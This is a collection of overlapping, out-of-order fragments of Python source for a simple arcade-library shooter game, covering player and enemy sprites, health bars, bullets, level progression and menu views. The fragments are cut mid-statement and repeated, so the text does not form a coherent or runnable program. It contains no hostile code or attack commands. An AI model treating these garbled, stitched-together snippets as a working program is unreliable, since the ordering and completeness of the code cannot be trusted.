"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3,",
"ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class has an",
"arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list",
"Use a mouse press to advance to the 'game' view. \"\"\" game_view =",
"220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\",",
"many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y",
"health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH",
"def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health",
"enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for",
"right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\")",
"= random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"\"\"\" # Move player around the screen self.center_x += self.change_x self.center_y += self.change_y",
"arcade.run() window.level = 0 # game = MyGame() # game.setup() # arcade.run() if",
"0: self.window.level = self.updated_level + 1 else: self.good = False def setup(self): #",
"+ HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): #",
"\"\"\"Called whenever a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed =",
"window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level =",
"- 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu'",
"on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if key",
"PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for",
"0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800",
"> player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x",
"the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw",
"\"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y",
"elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image,",
"enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level",
"arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove",
"# font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw",
"1 # Make sure he cant go off the screen if self.bottom <",
"arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110",
"isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") # Remove one health",
"Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self):",
"BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\"",
"enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level +",
"= False def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0,",
"go back to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view",
"bullet.center_y = start_y # Get from the mouse the destination location for the",
"the screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if",
"+ 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\"",
"Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): #",
"class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" #",
"< player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y",
"True elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed",
"attribute that controls # the sprite rotation. Change this, and the sprite rotates.",
"arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN)",
"2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level = 1",
"the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if",
"- 1 # Make sure he cant go off the screen if self.bottom",
"in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever",
"the bullet at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y",
"# Variables that will hold sprite lists self.player_list = None self.enemy_list = None",
"# Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that",
"and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y =",
"1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class",
"210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y =",
"self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) #",
"self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite)",
"HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate",
"The arcade.Sprite class has an \"angle\" attribute that controls # the sprite rotation.",
"0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the right",
"= 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X =",
"start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x,",
"= 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound =",
"logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed:",
"self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound",
"self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good",
"enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level >",
"player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet",
"# Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list",
"start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health",
"sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None # Set",
"self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have",
"= -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image,",
"= False def setup(self): # Set up the game # Sprite lists self.window.level",
"and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x =",
"how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y",
"# Make sure this is the right sprite if not isinstance(player, PLAYER): raise",
"15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED =",
"not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one",
"= y # Do math to calculate how to get the bullet to",
"self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update()",
"# Make sure he cant go off the screen if self.bottom < 0:",
"else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it.",
"the bullet to the destination. x_diff = dest_x - start_x y_diff = dest_y",
"when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over",
"= arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0",
"arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT",
"keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x =",
"12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in",
"60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x =",
"your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y =",
"self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound",
"enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the",
"= 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def",
"start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x +",
"<= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) #",
"= arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed =",
"arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x",
"it did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() #",
"return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers):",
"move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use",
"def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\"",
".60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7",
"800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED =",
"If the bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top",
"bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH,",
"SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5",
"# Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x =",
"window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup() # arcade.run()",
"over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x =",
"self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on",
"SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game",
"start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into",
"self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2",
"enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120,",
"arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases",
"self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good =",
"ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x =",
"SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x =",
"self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif key ==",
"y # Do math to calculate how to get the bullet to the",
"0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600",
"color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health /",
"BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X",
"= start_x bullet.center_y = start_y # Get from the mouse the destination location",
"a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key ==",
"HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar",
"__init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health",
"arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50)",
"arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False",
"to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click",
"0 # game = MyGame() # game.setup() # arcade.run() if __name__ == \"__main__\":",
"def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button is",
"the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE,",
"Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5",
"the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False",
"that controls # the sprite rotation. Change this, and the sprite rotates. self.angle",
"if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y >",
"and change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) *",
"self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop",
"Loop through each bullet for bullet in self.bullet_list: # Check this bullet to",
"the arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15)",
"# Position the bullet at the player's current location start_x = self.player_sprite.center_x start_y",
"in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player",
"elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list:",
"player_hit: # Make sure this is the right sprite if not isinstance(player, PLAYER):",
"elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite):",
"0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH",
"self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\"",
"start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button,",
"def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run()",
"self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y:",
"arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif key",
"self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x",
"if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove",
"self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed",
"self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) #",
"image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health =",
"self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will",
"self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go",
"self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player",
"self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"stored in this variable self.background = None def levels(self): while self.good: if self.window.level",
"== arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def",
"arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25,",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list ==",
"= arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10)",
"bullet dest_x = x dest_y = y # Do math to calculate how",
"\"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables",
"5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\")",
"= arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound =",
"key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class.",
"self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin.",
"= player_max_health def player_draw_health_number(self): # Draw how many health the enemies have health_string",
"anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x,",
"pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN:",
"= 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH =",
"arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers):",
"press to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view)",
"(self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width",
"to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\"",
"guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y",
"SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) #",
"arcade.Sprite class has an \"angle\" attribute that controls # the sprite rotation. Change",
"PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set",
"clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the",
"scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health",
"85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x",
"go to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y",
"be all ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check",
"= MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite)",
"dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) #",
"Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user",
"= False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background",
"GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) #",
"lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x =",
"= self.updated_level + 1 else: self.good = False def setup(self): # Set up",
"to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If",
"self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView()",
"start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to",
"the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x,",
"= 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1",
"start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y,",
"enemy_draw_health_bar(self): # Draw the health bar # Draw the red background if self.enemy_cur_health",
"ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\")",
"random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy)",
"== arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif",
"and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x =",
"# Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health)",
"update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level",
"on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5,",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x",
"and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy image",
"enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead",
"+= 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list:",
"game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not",
"SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25",
"bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the",
"bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) #",
"go off the screen if self.bottom < 0: self.bottom = 0 elif self.top",
"# enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the",
"(HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width),",
"if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this",
"25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 *",
"\"\"\"Called when the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed",
"in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2",
"in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and",
"height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def",
"\"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter",
